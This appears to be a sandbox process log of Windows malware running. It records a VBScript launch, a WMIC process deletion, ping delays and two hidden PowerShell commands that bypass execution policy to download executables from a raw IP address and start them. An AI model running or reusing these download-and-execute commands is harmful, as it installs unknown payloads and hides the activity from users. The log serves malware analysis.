wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\a.vbs"
1160WMIC.exe wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
2672PING.EXE ping 127.0.0.1 -n 5
2832powershell.exe PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/win.com','C:\Users\test22\AppData\Local\Temp\updateW\win.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\win.com'
260win.com "C:\Users\test22\AppData\Local\Temp\updateW\win.com"
872powershell.exe PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/64a1.com','C:\Users\test22\AppData\Local\Temp\updateW\64a1.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\64a1.com'
2228explorer.exe "C:\Windows (x86)\explorer.exe"
2196PING.EXE ping 127.0.0.1 -n 10
3020